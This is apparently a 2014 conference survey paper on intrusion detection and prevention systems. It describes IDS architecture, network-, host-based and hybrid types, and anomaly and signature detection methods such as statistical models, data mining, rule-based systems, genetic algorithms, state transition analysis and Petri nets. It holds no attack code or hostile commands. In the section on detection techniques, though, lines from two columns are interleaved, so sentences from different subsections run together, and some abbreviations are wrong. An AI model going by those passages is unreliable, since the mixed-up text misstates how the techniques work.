Intrusion Detection and Prevention System:
Challenges & Opportunities
Uzair Bashir
Department of Computer Sciences
Mewar University
Chittorgarh, Rajasthan, India
ub.cs@uok.edu.in
Abstract - The idea of making everything available readily
and universally has led to a revolution in the field of networks. In
spite of the tremendous growth of technologies in the field of
networks and information technology, we still lack in preventing
our resources from theft/attacks. This may not concern small
organizations but it is a serious issue as far as
industry/companies or national security is concerned.
Organizations are facing an increasing number of threats every
day in the form of viruses, intrusions, etc. Since many different
mechanisms were opted by organizations in the form of intrusion
detection and prevention systems to protect themselves from
these kinds of attacks, there are many security breaches which go
undetected. In order to understand the security risks and
IDPS(intrusion detection and prevention system), we will first
survey about the common security breaches and then after
discuss what are different opportunities and challenges in this
particular field. In this paper we have made a survey on the
overall progress of intrusion detection systems. We survey the
existing types, techniques and architectures of Intrusion
Detection Systems in the literature. Finally we outline the present
research challenges and issue.
Keywords—Architecture, Attack, Detection, IDS, Prevention,
Security, System, Virus.
I. INTRODUCTION
The growth of the Internet has no doubt changed the face of
world but it has also pointed out various security areas that
need to be addressed in order to provide a trustworthy
environment for those who are a part of this system or those
who wish to be [16]. Intrusion detection systems (IDS) have
come as a savior but every day new attacks or intrusions
provide a challenging atmosphere to even the most powerful
tools available. This paper does not provide a method to deal
with new attacks but tries to explain the current techniques
and their potent approaches to deal with attacks. This paper
also explains the issues and challenges that current IDS’s face.
The paper is organized as follows: Section 2 describes the
intrusion-detection system and its general architecture, Section
3 explains the techniques that IDS’s use to deal with the
intrusions.
978-93-80544-12-0/14/$31.00 2014
c IEEE
Manzoor Chachoo
Research Supervisor
Mewar University
Chittorgarh, Rajasthan, India.
c.manzoor@yahoo.com
II. OVERVIEW OF IDS
An intrusion detection system (IDS) is a software application
or a hardware that continuously monitors network traffic
and/or system activities for abnormal behavior or policy
violations and produces logs to an administration unit. The
extensive use of the Internet connects a host/network to every
other computer/network on this globe exposing it to every
possible intrusion [17]. An IDS is a security system that
dynamically monitors and observes the target system (which
can be file, folder, a host or a network) for any misuse and
tries to handle the abnormal behavior either by itself or by
producing alarms to an administrative unit.
The use of IDS becomes necessary because building a
completely secure system is almost next to impossible. This is
because the target system is usually invaded by two kinds of
users [18]:
Legitimate users: Those users who are a part of the system but
go beyond the scope of their confidence.
Illegitimate users: Those users who are unknown to the system
but try to breach the security of target system.
Protecting a system against the outsiders may seem to be easy
but then a large number of users also dwell within the
boundaries of the target system. An IDS system generated logs
which record the activities/events in a target system. A
legitimate user of a privilege similar to root/system
administrator can possibly work at lever lower than the level
where audit trials run and therefore bypass the monitoring
scheme. Hence, the security of a target system is more
susceptible to an intrusion from a member of the system.
Although there are counter measures for such issues also but
this gives a general idea of a loophole in a target system even
though we may protect it from illegitimate users.
III. GENERAL ARCHITECTURE OF AN IDS
A panoramic view of an IDS reveals that it is a security
system that monitors a target system continuously and
produces audit trials. These audit trials contain processed data
generated from the information coming from the target system
[1]. The audit trials can then be inspected automatically by
some tools either online or offline and/or used by some
manual authority (an administrator) who analyzes these logs
much closely [19]. The general architecture of an IDS is
806
shown in Figure 1. The location of an IDS is a significant
issue and depends on various factors like the security level,
budget and the environment. Generally, an IDS is placed
either at the network entry/exit points or with hosts itself, or
sometimes a combination of both.
The job of an IDPs is to simply monitor the data, analyze it
and accordingly prevent intrusions. The abnormal behavior
detected by an IDPs system can be dealt automatically or by
producing alarms to the manual station. An IDPs distinguishes
between the normal and an abnormal behavior based on
previous knowledge or policies already defined in it database.
Fig. 1: General Architecture of an IDS [1]
IV. TYPES OF IDS
As already mentioned there are various types of IDS’s
depending on their location and their choice depends mostly
on the resources, budget and certain other factors. An IDS
monitors a target system which can be network, a host, etc.
According to this classification we have two types of IDS’s:
network-based intrusion detection systems (NIDS) and host-
based intrusion detection systems (NIDS). Due to higher
security demands, a hybrid system is used nowadays that
combines the features of both NIDS and HIDS.
A. Network-Based Intrusion Systems
NIDS works at network level by analyzing the packets
travelling to and fro in a network. Their existence is clearly
isolated from network firewalls and can be thought of as a
second level of security systems. They work in stealth mode
and therefore can be more effective. NIDS can sniff on large
amounts of data, and if it finds any abnormal activity, it can
block all traffic related to that particular service.
B. Host-Based Intrusion Systems
HIDS analyze data, file-systems modifications, application
logs, etc. on individual hosts, or at least on hosts that fall
under the security requirements. Recent developments to
HIDS include monitoring system calls to operating system
2014 International Conference on Computing for Sustainable Global Development (INDIACom)
kernel [2]. They are a part of the system on which they are
installed, and if anyhow the security of a particular host is
compromised, the respective HIDS is also affected.
C. Hybrid Intrusion Detection Systems
The introduction of distributed environment has pointed out
various security issues which have remained undermined
before. This has asked for a higher degree of defense systems.
A hybrid system works as an integration of network-based and
host-based systems.
V. INTRUSION DETECTION TECHNIQUES
IDS’s are classified on various characteristics like behavior,
cognizance, etc. The IDS have mainly two methods of
detection - Anomaly based and Signature based. In an
anomaly based technique a set of rules/activities is pre-defined
for a user or a system. These rules/activities mark the normal
behavior for the IDS. This model was originally proposed by
Denning [3] and since then extensive work has been done to
enhance the technique. Anything that doesn’t fit the list of
rules is an abnormal behavior which is considered to be an
anomaly and, therefore, needs attention. The IDS continuously
monitors the traffic looking for abnormal behaviors marking
everything that is abnormal as suspicious [4]. This method is
very robust with most intrusions but the problem lies in
defining the boundary between the normal and abnormal
behavior within a system. The rate of false alarms is high in
this technique, and requires redefinition of the rules/activities
if a privilege for a user needs to be altered. There are various
methods that employ anomaly-based detection, some of them
include: Statistical model, Neural networks, Data mining
based methods.
Signature based technique, on the other hand, has a database
of already known attacks and based on this knowledge; it tries
to deal with the intrusions. This technique is also called
misuse detection and is considered to be a powerful technique
for known attacks and those similar in behavior with those
already defined. The technique, however, lacks the ability to
catch new intrusions. These include: rule based, expert
systems, genetic algorithm, pattern matching, state transition
and signature analysis.
A. Statistical Models
It is the most widely used method for detecting intrusions
These techniques try to differentiate between the normal and
abnormal behavior based on some parameters that are
collected over time. Examples include bandwidth, CPU
utilization, user session time, etc. These parameters collected
eventually, are used to create profiles for individual
users/activities. If the values of these parameters go beyond
what has been learnt as normal about the entity, an intrusion is
flagged. Methods like NIDES, Haystack are based on
statistical models. Statistical model are the earliest of the
models though newer techniques like Haystack which are
implemented in distributed environments make them a
competitor.
807
 F. State transition based
B. Data Mining Based Methods This method uses the finite state theory as a basis for detecting
intrusions. It denotes various network states as states of a
The strength of IDS is improved by periodically updating the
finite state machine. If a sequel state is identified from the
rules and data by an expert system. This process is manual
network state of finite state machine, an intrusion is detected
and, therefore, time consuming. System builders rely on their
[2]. The method represents the intermediate steps of a
intuition and experience to select the statistical measures for
penetration as states that must lead to an intrusion. The
anomaly detection [11].These drawbacks have led to a method
graphical representation of intrusions makes it easier to derive
of feeding the IDS with new set of rules and data that are
the intrusions from the intermediate states that must take place
learnt automatically. Data-mining based methods use the audit
for the successful completion of an intrusion [13]. In addition
data to draw patterns from the activities and user behavior and
to these initial and compromised states, there exist some states
then use these patterns to identify anomalies in the system.
known as signature states that represent the actions that would
The facts that are collected from the audit data are used to
prevent an intrusion if they are omitted.
gradually learn about the behavior of events and activities.
The learning process is gradual and induced and follows a
data-centric approach. It is assumed that legitimate or G. Expert based systems
illegitimate activity will have their footprints in the audit data In earlier days of development, the data called audits produced
[10]. by IDS was forwarded to an administrator (a human) who
used to analyze those long log files and check for suspicious.
C. Signature analysis The disadvantage of this method was time consuming and
exhaustive study of audit trials. Recently computer machines
This method behaves like the basic misuse detection technique
have been developed with human like knowledge and
and looks for the patterns of data in the audit trials. This
reasoning maintained as a knowledge base [2]. These are in
method is very similar to knowledge based systems but the
fact used by knowledge based IDS techniques [6]. In addition
complexity regarding the semantics of attacks as in expert
to this knowledge base there is a set of rules and heuristics that
systems is very low in this technique. As a result, most of the
is applied on this knowledge base to trap intrusions, if any.
commercial IDS products use this technique [7, 8, 9]

H. Petri nets
D. Rule based systems
They are knowledge based systems that use mathematical
The systems that employ rule based techniques have a set of
models to represent the states of a system graphically. A
predefined rules and an expert system that looks for any signs
knowledge based Petri net model, IDIOT [9] that uses Colored
of intrusions. These rules are developed overtime by, for
Petri nets has been developed at PURDUE University. The
example, monitoring a network connection and its behavior.
vertices of the graph represent the system states and the
Rules generated in the likewise manner are then combined to
transition from one state to another is marked by events. Three
form a knowledge base for such IDS. During the analysis of
parameters must be satisfied – pre-condition which identifies
audit trials any activity that is found to deviate from the
the actions that must occur before the pattern matching, post
normal track is fed to an expert system for dealing with an
actions which define the actions after the pattern matching and
intrusion [13]. These methods are used as support systems for
invariants which are the conditions looked for during the
an IDS with additional services offered by expert systems.
process of pattern matching.
IDES, NADIR are some examples of rule based systems.

VI. FUTURE DEVELOPMENTS IN IDS TECHNIQUES

E. Genetic Algorithms
The successful growth of artificial intelligence has put a great
This method is simply based on the concept of human genome
challenge of incorporating this new field in Intrusion
systems. Through continuous monitoring it evolves and
Detection Systems. Presently, restrained by its novel
develops a data structure called chromosomes which represent
implementation [14], it is going to be a major contribution to
the problems to be solved [5]. These are machine learning
IDS methodology. The four areas have been discussed in [15]
based techniques and are called evolutionary algorithms or
which describe the application of AI in IDS.
evolutionary computations [12]. Eventually, rules are
Use of neural networks can also be effective in IDS. Their
generated which judge the intrusions and their counter
capability to process huge data and derive meaning and
measures. If a condition for that rules is met, then a set of
patterns [15] from it can be applied to find attacks. Gradually,
predefined actions is performed. Since biological parameters
it keeps on learning keeping track of previous penetrations and
are involves, it involves a higher degree of resource
analyzing data for newer ones.
utilization.

808 2014 International Conference on Computing for Sustainable Global Development (INDIACom)
 VII. CONCLUSION
This survey paper gives a description of some intrusion
detection approaches based on two basic techniques. Some
approaches work better in one environment but then prove to
be weak in other environments. A generic technique needs to
be developed that can help us to secure our networks in any
environment. This requires a detailed knowledge of already
existing techniques and their loopholes so that researchers can
propose ideas to overcome the weaknesses and develop a
much stronger approach to deal with intrusions.
REFERENCES
[1] Debar, Hervé, Marc Dacier, and Andreas Wespi. "Towards a taxonomy
of intrusion-detection systems." Computer Networks 31.8 (1999): 805-
822.
[2] Sonawane, Sandip, Ganesh Prasad, and Shailendra Pardeshi. "A survey
on intrusion detection techniques." World Journal of Science and
Technology 2.3 (2012).
[3] Denning, Dorothy E. "An intrusion-detection model." Software
Engineering, IEEE Transactions on 2 (1987): 222-232.
[4] Axelsson, Stefan. Intrusion detection systems: A survey and taxonomy.
Vol. 99. Technical report, 2000.
[5] Li, Wei. "Using genetic algorithm for network intrusion
detection." Proceedings of the United States Department of Energy
Cyber Security Group (2004): 1-8.
[6] Lunt, Teresa F., and R. Jagannathan. "A prototype real-time intrusion-
detection expert system." Security and Privacy, 1988. Proceedings.,
1988 IEEE Symposium on. IEEE, 1988.
[7] Haystack Labs, Inc.Stalker, available from the company’s website at
http://www.haystack.com/stalk.htm, 1997.
[8] Internet Security Systems, Inc.RealSecure, Internet
http://www.iss.net/prod/rsds.html, 1997.
[9] Kumar, Sandeep, and Eugene H. Spafford. "A pattern matching model
for misuse intrusion detection." (1994).
[10] Lee, Wenke, Salvatore J. Stolfo, and Kui W. Mok. "Mining Audit Data
to Build Intrusion Detection Models." KDD. 1998.
[11] Lunt, Teresa. "Detecting intruders in computer systems." In Proceedings
of the 1993 Conference on Auditing and Computer Technology. 1993.
[12] Helman, Paul, and Gunar Liepins. "Statistical foundations of audit trail
analysis for the detection of computer misuse." Software Engineering,
IEEE Transactions on 19.9 (1993): 886-901.
[13] Ilgun, Koral, Richard A. Kemmerer, and Phillip A. Porras. "State
transition analysis: A rule-based intrusion detection approach." Software
Engineering, IEEE Transactions on 21.3 (1995): 181-199.
[14] Frank, Jeremy. "Artificial intelligence and intrusion detection: Current
and future directions." Proceedings of the 17th National Computer
Security Conference. Vol. 10. 1994.
[15] Cannady, James, and Jay Harrell. "A comparative analysis of current
intrusion detection technologies." Proceedings of the Fourth Technology
for Information Security Conference. Vol. 96. 1996.
[16] Beigh, Bilal Maqbool, and M. A. Peer. "Intrusion Detection and
Prevention System: Classification and Quick." (2011).
[17] Mir, Suhail Qadir, S. M. K. Mehraj-ud-din Dar, and Bilal Maqbool Beig.
"INFORMATION AVAILABILITY: COMPONENTS, THREATS
AND PROTECTION MECHANISMS." Journal of Global Research in
Computer Science Journal of Global Research in Computer Science 2.3
(2011).
[18] Williamson, Matthew M. "Resilient infrastructure for network security."
Complexity 9.2 (2003): 34-40.
[19] Karlzén, Henrik. "An Analysis of Security Information and Event
Management Systems-The Use or SIEMs for Log Collection,
Management and Analysis." (2009).

2014 International Conference on Computing for Sustainable Global Development (INDIACom) 809